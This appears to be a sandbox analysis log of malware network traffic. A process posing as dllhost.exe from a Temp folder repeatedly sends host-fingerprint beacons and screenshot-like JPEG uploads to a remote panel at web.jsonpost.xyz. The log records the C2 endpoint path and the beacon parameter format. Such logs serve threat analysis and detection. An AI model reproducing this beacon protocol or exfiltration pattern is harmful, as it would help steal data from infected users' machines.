                                                                                Nov 29, 2024 01:52:58.549088955 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream
                                                                                Nov 29, 2024 01:52:58.549156904 CET10240OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                Nov 29, 2024 01:52:58.549177885 CET1236OUTData Raw: fb 52 6c f4 34 05 c8 cd 14 e2 ac 3b 53 69 0c 28 a2 8a 00 43 45 14 50 30 a4 34 b4 9c d0 01 45 14 50 00 69 29 68 c5 03 12 8a 28 a0 04 34 52 d1 40 c4 a2 8a 28 01 0d 14 b4 94 00 52 1a 5a 28 18 94 50 68 a0 04 c1 a2 96 8e d4 c6 25 25 2d 21 a0 02 8a 28
                                                                                Data Ascii: Rl4;Si(CEP04EPi)h(4R@(RZ(Ph%%-!(0QE'j)i(4um!(bQEJJu%((PhE!S1E(RwhJ(F)h@RPEE8cKI@0Ri/Z(CE=(4
                                                                                Nov 29, 2024 01:52:58.669486046 CET9888OUTData Raw: de 49 69 75 19 8e 58 ce 08 3d fd c7 b5 6f 43 1f 42 bc b9 20 f5 39 f1 39 6e 23 0f 0e 79 ad 3c 8a b4 77 a3 14 57 61 c0 21 a2 96 92 80 0a 43 4b 45 03 12 8a 28 a0 02 92 96 8a 06 25 21 a5 a2 80 12 83 4b 49 4c 04 a2 96 8a 06 25 25 2d 25 03 0a 4a 5a 28
                                                                                Data Ascii: IiuX=oCB 99n#y<wWa!CKE(%!KIL%%-%JZ((%CE-%%(4P1))h4P1(4Q@RbBRSHhRP1%:JJZ()iJZJ))h))i())JJZ(<^hNZObPhiB9"ByP0%Nih#
                                                                                Nov 29, 2024 01:52:58.669537067 CET2472OUTData Raw: 45 14 50 30 a2 8a 29 00 94 52 d1 40 09 45 14 50 02 1a 0d 2d 14 00 94 51 45 00 25 14 b4 94 c6 14 51 45 00 25 14 b4 53 01 29 29 68 c5 03 42 52 52 d1 40 c4 a2 8a 29 80 51 46 28 e2 80 0c 91 4e 0e 40 a6 d1 8a 60 38 ed 6e ab f9 53 4c 4a 7e eb 63 eb 49
                                                                                Data Ascii: EP0)R@EP-QE%QE%S))hBRR@)QF(N@`8nSLJ~cI9bv1wh(ZiR+qVE6)))hR@4P1(JCKE1EJLS6RRKAqIu%1N%!)P1@%:(RbLP11II
                                                                                Nov 29, 2024 01:52:58.669569969 CET2472OUTData Raw: a9 07 fe f9 af 76 85 92 86 ba f3 7f 91 e5 e3 6e f9 f4 d3 95 7e 47 90 51 4b da 92 be d4 fc d8 28 a2 8a 00 cf d5 ff 00 e3 d1 7f eb a0 fe 46 b7 be 1b 43 35 b6 a5 79 ad cb 29 87 4c b2 b7 7f b5 12 32 24 04 70 9e e7 a1 fc 07 ad 63 6a 30 49 71 6e ab 12
                                                                                Data Ascii: vn~GQK(FC5y)L2$pcj0Iqn`8j}3,4!M?.c.0yRW4<veRr")no,5$tu`rt=1xSR]/U)}we7<p+bDmBy?z/P|=5gi
                                                                                Nov 29, 2024 01:52:58.669612885 CET2472OUTData Raw: a9 ad 4c 96 b1 bc 45 ca 4c 57 6a 85 f3 bc cc e1 97 39 40 00 24 82 d8 19 ce b2 d4 6c af 26 37 57 37 e2 04 be d4 1e ca cc 25 82 a6 e6 5d b9 2e 88 e0 22 82 ea 38 dc 4f 27 15 10 b5 be 48 ad 51 66 b5 66 b3 31 fd 9a 79 2d 62 69 a2 f2 db 72 01 21 42 d8
                                                                                Data Ascii: LELWj9@$l&7W7%]."8O'HQff1y-bir!Bp82MCJg9,<AY8~{ejZkL!Ie693"DT`x Y6]P%]P#3)pw;'sd+,BOyXr_U#:#q
                                                                                Nov 29, 2024 01:52:58.669651985 CET2472OUTData Raw: 26 29 31 8a 71 e0 52 1a 56 18 dc 51 c7 34 bf a1 a4 f5 fe 54 58 62 63 23 14 df 7a 79 1c 8c 52 51 61 8d e9 47 bd 3b 14 86 81 88 41 a3 8a 5c 67 ff 00 af 4d ed 4c 35 13 de 8e 73 4e 20 52 1e 28 01 31 8a 00 f7 a7 0c 1f 6a 41 40 c4 23 f9 d3 7f 5a 71 39
                                                                                Data Ascii: &)1qRVQ4TXbc#zyRQaG;A\gML5sN R(1jA@#Zq9j%(HE/GCX/z:GZ\q@/CE!:I@4RENwb|Q@Q@EJ)MQEQE%@CE-QEQERPIKE%Q@Q@P
                                                                                Nov 29, 2024 01:52:58.669723034 CET1236OUTData Raw: b4 50 01 8a 31 45 14 0c 4a 4a 75 25 08 04 a2 8a 51 4c 02 93 14 b4 50 02 77 a2 97 14 94 c6 18 a4 c7 34 b8 a2 98 09 45 2d 14 00 94 98 a5 a3 19 a6 02 52 53 e9 31 45 c6 37 9a 33 ff 00 d6 a5 a3 14 0c 4c e3 a5 2e 73 f7 80 3f 5a 31 48 45 00 21 8e 36 f5
                                                                                Data Ascii: P1EJJu%QLPw4E-RS1E73L.s?Z1HE!6SL00aRbP4 e# UN9JWJw)Lz1Q2tRLS9L|~qAS1I?1EGf&FFi1GzVH#E+`O9!`jp9
                                                                                Nov 29, 2024 01:52:58.669759989 CET2472OUTData Raw: 0f 80 f5 1d 88 88 3c d4 e1 2c 24 b4 1f 7d 3f 81 f9 3f 5e 9d bb 57 9b d7 a9 78 a2 c6 1d 3f c1 77 f1 42 f7 0c a5 e3 62 67 b8 92 66 cf 98 9f c4 ec 4e 38 e9 9c 57 97 57 6e 50 f9 a3 37 e6 78 1c 42 b9 6a 53 5e 42 51 4b 45 7b 07 ce 89 45 29 a4 a0 62 51
                                                                                Data Ascii: <,$}??^Wx?wBbgfN8WWnP7xBjS^BQKE{E)bQKI@QL(0(1PQPIKI@`%(L(4Q@E-%1!4QE))i()))h((QERZ)QE0(Q@PhSH)QERRLb-'z`


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                75192.168.2.44981872.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:58.844618082 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                76192.168.2.44982472.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:53:00.027614117 CET195OUTPOST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:53:00.027654886 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream
                                                                                Nov 29, 2024 01:53:00.027726889 CET10240OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                Nov 29, 2024 01:53:00.027749062 CET1236OUTData Raw: fb 52 6c f4 34 05 c8 cd 14 e2 ac 3b 53 69 0c 28 a2 8a 00 43 45 14 50 30 a4 34 b4 9c d0 01 45 14 50 00 69 29 68 c5 03 12 8a 28 a0 04 34 52 d1 40 c4 a2 8a 28 01 0d 14 b4 94 00 52 1a 5a 28 18 94 50 68 a0 04 c1 a2 96 8e d4 c6 25 25 2d 21 a0 02 8a 28
                                                                                Data Ascii: Rl4;Si(CEP04EPi)h(4R@(RZ(Ph%%-!(0QE'j)i(4um!(bQEJJu%((PhE!S1E(RwhJ(F)h@RPEE8cKI@0Ri/Z(CE=(4
                                                                                Nov 29, 2024 01:53:00.147890091 CET4944OUTData Raw: de 49 69 75 19 8e 58 ce 08 3d fd c7 b5 6f 43 1f 42 bc b9 20 f5 39 f1 39 6e 23 0f 0e 79 ad 3c 8a b4 77 a3 14 57 61 c0 21 a2 96 92 80 0a 43 4b 45 03 12 8a 28 a0 02 92 96 8a 06 25 21 a5 a2 80 12 83 4b 49 4c 04 a2 96 8a 06 25 25 2d 25 03 0a 4a 5a 28
                                                                                Data Ascii: IiuX=oCB 99n#y<wWa!CKE(%!KIL%%-%JZ((%CE-%%(4P1))h4P1(4Q@RbBRSHhRP1%:JJZ()iJZJ))h))i())JJZ(<^hNZObPhiB9"ByP0%Nih#
                                                                                Nov 29, 2024 01:53:00.148052931 CET4944OUTData Raw: fc 81 27 ff 00 13 47 fc 26 fe 1d ff 00 a0 87 fe 40 93 ff 00 89 af 24 6b 6b 95 b3 17 8d 6b 70 2d 4f 49 cc 2d e5 9e 71 f7 b1 8e be f4 d8 e1 9e 6b 79 6e 21 b7 9e 58 21 cf 9b 2c 71 33 22 60 64 e4 81 81 c7 ad 73 7f 64 50 b5 fd a7 e4 75 7f 6e 62 6f 6f
                                                                                Data Ascii: 'G&@$kkkp-OI-qkyn!X!,q3"`dsdPunbooe)NxnMWuI:^o@tI8?!w0*3d~uqs1uqrRm`<(yyWn8IjRE_|k!u#FR_[xAm,V
                                                                                Nov 29, 2024 01:53:00.148180008 CET2472OUTData Raw: 45 14 50 30 a2 8a 29 00 94 52 d1 40 09 45 14 50 02 1a 0d 2d 14 00 94 51 45 00 25 14 b4 94 c6 14 51 45 00 25 14 b4 53 01 29 29 68 c5 03 42 52 52 d1 40 c4 a2 8a 29 80 51 46 28 e2 80 0c 91 4e 0e 40 a6 d1 8a 60 38 ed 6e ab f9 53 4c 4a 7e eb 63 eb 49
                                                                                Data Ascii: EP0)R@EP-QE%QE%S))hBRR@)QF(N@`8nSLJ~cI9bv1wh(ZiR+qVE6)))hR@4P1(JCKE1EJLS6RRKAqIu%1N%!)P1@%:(RbLP11II
                                                                                Nov 29, 2024 01:53:00.148225069 CET2472OUTData Raw: a9 07 fe f9 af 76 85 92 86 ba f3 7f 91 e5 e3 6e f9 f4 d3 95 7e 47 90 51 4b da 92 be d4 fc d8 28 a2 8a 00 cf d5 ff 00 e3 d1 7f eb a0 fe 46 b7 be 1b 43 35 b6 a5 79 ad cb 29 87 4c b2 b7 7f b5 12 32 24 04 70 9e e7 a1 fc 07 ad 63 6a 30 49 71 6e ab 12
                                                                                Data Ascii: vn~GQK(FC5y)L2$pcj0Iqn`8j}3,4!M?.c.0yRW4<veRr")no,5$tu`rt=1xSR]/U)}we7<p+bDmBy?z/P|=5gi
                                                                                Nov 29, 2024 01:53:00.148367882 CET2472OUTData Raw: a9 ad 4c 96 b1 bc 45 ca 4c 57 6a 85 f3 bc cc e1 97 39 40 00 24 82 d8 19 ce b2 d4 6c af 26 37 57 37 e2 04 be d4 1e ca cc 25 82 a6 e6 5d b9 2e 88 e0 22 82 ea 38 dc 4f 27 15 10 b5 be 48 ad 51 66 b5 66 b3 31 fd 9a 79 2d 62 69 a2 f2 db 72 01 21 42 d8
                                                                                Data Ascii: LELWj9@$l&7W7%]."8O'HQff1y-bir!Bp82MCJg9,<AY8~{ejZkL!Ie693"DT`x Y6]P%]P#3)pw;'sd+,BOyXr_U#:#q
                                                                                Nov 29, 2024 01:53:00.148425102 CET2472OUTData Raw: 26 29 31 8a 71 e0 52 1a 56 18 dc 51 c7 34 bf a1 a4 f5 fe 54 58 62 63 23 14 df 7a 79 1c 8c 52 51 61 8d e9 47 bd 3b 14 86 81 88 41 a3 8a 5c 67 ff 00 af 4d ed 4c 35 13 de 8e 73 4e 20 52 1e 28 01 31 8a 00 f7 a7 0c 1f 6a 41 40 c4 23 f9 d3 7f 5a 71 39
                                                                                Data Ascii: &)1qRVQ4TXbc#zyRQaG;A\gML5sN R(1jA@#Zq9j%(HE/GCX/z:GZ\q@/CE!:I@4RENwb|Q@Q@EJ)MQEQE%@CE-QEQERPIKE%Q@Q@P
                                                                                Nov 29, 2024 01:53:00.148447037 CET1236OUTData Raw: b4 50 01 8a 31 45 14 0c 4a 4a 75 25 08 04 a2 8a 51 4c 02 93 14 b4 50 02 77 a2 97 14 94 c6 18 a4 c7 34 b8 a2 98 09 45 2d 14 00 94 98 a5 a3 19 a6 02 52 53 e9 31 45 c6 37 9a 33 ff 00 d6 a5 a3 14 0c 4c e3 a5 2e 73 f7 80 3f 5a 31 48 45 00 21 8e 36 f5
                                                                                Data Ascii: P1EJJu%QLPw4E-RS1E73L.s?Z1HE!6SL00aRbP4 e# UN9JWJw)Lz1Q2tRLS9L|~qAS1I?1EGf&FFi1GzVH#E+`O9!`jp9


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                77192.168.2.44982572.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:53:00.310821056 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                78192.168.2.44982672.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:53:01.527319908 CET195OUTPOST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----b3714476196bb616692c6ded08e7aac7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98018
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:53:01.527390957 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 62 33 37 31 34 34 37 36 31 39 36 62 62 36 31 36 36 39 32 63 36 64 65 64 30 38 65 37 61 61 63 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------b3714476196bb616692c6ded08e7aac7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream
                                                                                Nov 29, 2024 01:53:01.527470112 CET10240OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                Nov 29, 2024 01:53:01.527493000 CET1236OUTData Raw: fb 52 6c f4 34 05 c8 cd 14 e2 ac 3b 53 69 0c 28 a2 8a 00 43 45 14 50 30 a4 34 b4 9c d0 01 45 14 50 00 69 29 68 c5 03 12 8a 28 a0 04 34 52 d1 40 c4 a2 8a 28 01 0d 14 b4 94 00 52 1a 5a 28 18 94 50 68 a0 04 c1 a2 96 8e d4 c6 25 25 2d 21 a0 02 8a 28
                                                                                Data Ascii: Rl4;Si(CEP04EPi)h(4R@(RZ(Ph%%-!(0QE'j)i(4um!(bQEJJu%((PhE!S1E(RwhJ(F)h@RPEE8cKI@0Ri/Z(CE=(4
                                                                                Nov 29, 2024 01:53:01.647608995 CET4944OUTData Raw: de 49 69 75 19 8e 58 ce 08 3d fd c7 b5 6f 43 1f 42 bc b9 20 f5 39 f1 39 6e 23 0f 0e 79 ad 3c 8a b4 77 a3 14 57 61 c0 21 a2 96 92 80 0a 43 4b 45 03 12 8a 28 a0 02 92 96 8a 06 25 21 a5 a2 80 12 83 4b 49 4c 04 a2 96 8a 06 25 25 2d 25 03 0a 4a 5a 28
                                                                                Data Ascii: IiuX=oCB 99n#y<wWa!CKE(%!KIL%%-%JZ((%CE-%%(4P1))h4P1(4Q@RbBRSHhRP1%:JJZ()iJZJ))h))i())JJZ(<^hNZObPhiB9"ByP0%Nih#
                                                                                Nov 29, 2024 01:53:01.647731066 CET4944OUTData Raw: fc 81 27 ff 00 13 47 fc 26 fe 1d ff 00 a0 87 fe 40 93 ff 00 89 af 24 6b 6b 95 b3 17 8d 6b 70 2d 4f 49 cc 2d e5 9e 71 f7 b1 8e be f4 d8 e1 9e 6b 79 6e 21 b7 9e 58 21 cf 9b 2c 71 33 22 60 64 e4 81 81 c7 ad 73 7f 64 50 b5 fd a7 e4 75 7f 6e 62 6f 6f
                                                                                Data Ascii: 'G&@$kkkp-OI-qkyn!X!,q3"`dsdPunbooe)NxnMWuI:^o@tI8?!w0*3d~uqs1uqrRm`<(yyWn8IjRE_|k!u#FR_[xAm,V
                                                                                Nov 29, 2024 01:53:01.647838116 CET4944OUTData Raw: 45 14 50 30 a2 8a 29 00 94 52 d1 40 09 45 14 50 02 1a 0d 2d 14 00 94 51 45 00 25 14 b4 94 c6 14 51 45 00 25 14 b4 53 01 29 29 68 c5 03 42 52 52 d1 40 c4 a2 8a 29 80 51 46 28 e2 80 0c 91 4e 0e 40 a6 d1 8a 60 38 ed 6e ab f9 53 4c 4a 7e eb 63 eb 49
                                                                                Data Ascii: EP0)R@EP-QE%QE%S))hBRR@)QF(N@`8nSLJ~cI9bv1wh(ZiR+qVE6)))hR@4P1(JCKE1EJLS6RRKAqIu%1N%!)P1@%:(RbLP11II
                                                                                Nov 29, 2024 01:53:01.648013115 CET4944OUTData Raw: a9 ad 4c 96 b1 bc 45 ca 4c 57 6a 85 f3 bc cc e1 97 39 40 00 24 82 d8 19 ce b2 d4 6c af 26 37 57 37 e2 04 be d4 1e ca cc 25 82 a6 e6 5d b9 2e 88 e0 22 82 ea 38 dc 4f 27 15 10 b5 be 48 ad 51 66 b5 66 b3 31 fd 9a 79 2d 62 69 a2 f2 db 72 01 21 42 d8
                                                                                Data Ascii: LELWj9@$l&7W7%]."8O'HQff1y-bir!Bp82MCJg9,<AY8~{ejZkL!Ie693"DT`x Y6]P%]P#3)pw;'sd+,BOyXr_U#:#q
                                                                                Nov 29, 2024 01:53:01.648013115 CET1236OUTData Raw: b4 50 01 8a 31 45 14 0c 4a 4a 75 25 08 04 a2 8a 51 4c 02 93 14 b4 50 02 77 a2 97 14 94 c6 18 a4 c7 34 b8 a2 98 09 45 2d 14 00 94 98 a5 a3 19 a6 02 52 53 e9 31 45 c6 37 9a 33 ff 00 d6 a5 a3 14 0c 4c e3 a5 2e 73 f7 80 3f 5a 31 48 45 00 21 8e 36 f5
                                                                                Data Ascii: P1EJJu%QLPw4E-RS1E73L.s?Z1HE!6SL00aRbP4 e# UN9JWJw)Lz1Q2tRLS9L|~qAS1I?1EGf&FFi1GzVH#E+`O9!`jp9
                                                                                Nov 29, 2024 01:53:01.648222923 CET2472OUTData Raw: 0f 80 f5 1d 88 88 3c d4 e1 2c 24 b4 1f 7d 3f 81 f9 3f 5e 9d bb 57 9b d7 a9 78 a2 c6 1d 3f c1 77 f1 42 f7 0c a5 e3 62 67 b8 92 66 cf 98 9f c4 ec 4e 38 e9 9c 57 97 57 6e 50 f9 a3 37 e6 78 1c 42 b9 6a 53 5e 42 51 4b 45 7b 07 ce 89 45 29 a4 a0 62 51
                                                                                Data Ascii: <,$}??^Wx?wBbgfN8WWnP7xBjS^BQKE{E)bQKI@QL(0(1PQPIKI@`%(L(4Q@E-%1!4QE))i()))h((QERZ)QE0(Q@PhSH)QERRLb-'z`
                                                                                Nov 29, 2024 01:53:01.767749071 CET4944OUTData Raw: 70 32 a4 11 83 d4 73 59 8b 05 cc 52 69 eb a7 59 3d bd 9d 93 4c ef 05 dc de 71 b9 32 a8 47 0e ca a9 f2 94 01 40 00 63 93 9c d3 a4 b7 b8 11 5b c3 a3 db 4f a7 88 2e 63 ba 32 dc 4e 26 91 9e 3c f9 6b 90 aa 02 8c 93 8c 64 93 c9 e8 2b c8 e6 c7 37 75 7e
                                                                                Data Ascii: p2sYRiY=Lq2G@c[O.c2N&<kd+7u~oO,Q2t[tx>$[b((r<M"4`qHbOrZ\ZZ[%t~d r\]Amf+i,6{W.|98QR+KSHS


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                79192.168.2.44982972.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:53:01.775747061 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                80192.168.2.44983372.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:53:03.002723932 CET195OUTPOST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----b3714476196bb616692c6ded08e7aac7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98018
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:53:03.002819061 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 62 33 37 31 34 34 37 36 31 39 36 62 62 36 31 36 36 39 32 63 36 64 65 64 30 38 65 37 61 61 63 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------b3714476196bb616692c6ded08e7aac7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream
                                                                                Nov 29, 2024 01:53:03.002876997 CET10240OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                Nov 29, 2024 01:53:03.002957106 CET1236OUTData Raw: fb 52 6c f4 34 05 c8 cd 14 e2 ac 3b 53 69 0c 28 a2 8a 00 43 45 14 50 30 a4 34 b4 9c d0 01 45 14 50 00 69 29 68 c5 03 12 8a 28 a0 04 34 52 d1 40 c4 a2 8a 28 01 0d 14 b4 94 00 52 1a 5a 28 18 94 50 68 a0 04 c1 a2 96 8e d4 c6 25 25 2d 21 a0 02 8a 28
                                                                                Data Ascii: Rl4;Si(CEP04EPi)h(4R@(RZ(Ph%%-!(0QE'j)i(4um!(bQEJJu%((PhE!S1E(RwhJ(F)h@RPEE8cKI@0Ri/Z(CE=(4
                                                                                Nov 29, 2024 01:53:03.122905016 CET2472OUTData Raw: de 49 69 75 19 8e 58 ce 08 3d fd c7 b5 6f 43 1f 42 bc b9 20 f5 39 f1 39 6e 23 0f 0e 79 ad 3c 8a b4 77 a3 14 57 61 c0 21 a2 96 92 80 0a 43 4b 45 03 12 8a 28 a0 02 92 96 8a 06 25 21 a5 a2 80 12 83 4b 49 4c 04 a2 96 8a 06 25 25 2d 25 03 0a 4a 5a 28
                                                                                Data Ascii: IiuX=oCB 99n#y<wWa!CKE(%!KIL%%-%JZ((%CE-%%(4P1))h4P1(4Q@RbBRSHhRP1%:JJZ()iJZJ))h))i())JJZ(<^hNZObPhiB9"ByP0%Nih#
                                                                                Nov 29, 2024 01:53:03.123017073 CET4944OUTData Raw: fa 13 57 d0 70 a5 49 47 1d c8 9e 8d 3b 9f 3d c4 f4 e3 2c 17 33 dd 34 73 54 51 45 7e 90 7e 7c 14 51 45 00 15 e8 5f 0b bf e4 5f d4 3f ec 23 27 fe 82 95 e7 b5 e8 5f 0b bf e4 5f d4 3f ec 23 27 fe 82 95 f3 f9 ef fc ba f5 7f 91 f5 fc 2d fc 3c 4f a4 7f
                                                                                Data Ascii: WpIG;=,34sTQE~~|QE__?#'__?#'-<O15_F+4VSNg9=m[HET#r5{CN%Oor/"y{F3K u%y{&3am#vsWFbkbU)#OH46I(
                                                                                Nov 29, 2024 01:53:03.123131990 CET4944OUTData Raw: 61 d6 75 4d 7a e8 4e fa 58 f3 dd ae b9 fb 3c 96 85 48 45 56 e8 78 2a a1 41 c8 38 18 18 e3 30 59 ea 3a bd a5 b6 a5 69 f6 a9 74 b8 b4 e8 84 12 5b 82 52 de 45 8c 79 a1 c8 e2 36 df b9 8e 71 9c 83 d0 d5 98 f4 c4 b6 b9 4b ab 29 e7 b4 b8 4c ed 96 09 0a
                                                                                Data Ascii: auMzNX<HEVx*A80Y:it[REy6qK)L2`5`ziY/3YA;l&]OMZXEY~o*U0n97\"YMUl4K;EFzl`<XJ3vylH;J},s[
                                                                                Nov 29, 2024 01:53:03.123245001 CET4944OUTData Raw: a9 07 fe f9 af 76 85 92 86 ba f3 7f 91 e5 e3 6e f9 f4 d3 95 7e 47 90 51 4b da 92 be d4 fc d8 28 a2 8a 00 cf d5 ff 00 e3 d1 7f eb a0 fe 46 b7 be 1b 43 35 b6 a5 79 ad cb 29 87 4c b2 b7 7f b5 12 32 24 04 70 9e e7 a1 fc 07 ad 63 6a 30 49 71 6e ab 12
                                                                                Data Ascii: vn~GQK(FC5y)L2$pcj0Iqn`8j}3,4!M?.c.0yRW4<veRr")no,5$tu`rt=1xSR]/U)}we7<p+bDmBy?z/P|=5gi
                                                                                Nov 29, 2024 01:53:03.123589039 CET3708OUTData Raw: 26 29 31 8a 71 e0 52 1a 56 18 dc 51 c7 34 bf a1 a4 f5 fe 54 58 62 63 23 14 df 7a 79 1c 8c 52 51 61 8d e9 47 bd 3b 14 86 81 88 41 a3 8a 5c 67 ff 00 af 4d ed 4c 35 13 de 8e 73 4e 20 52 1e 28 01 31 8a 00 f7 a7 0c 1f 6a 41 40 c4 23 f9 d3 7f 5a 71 39
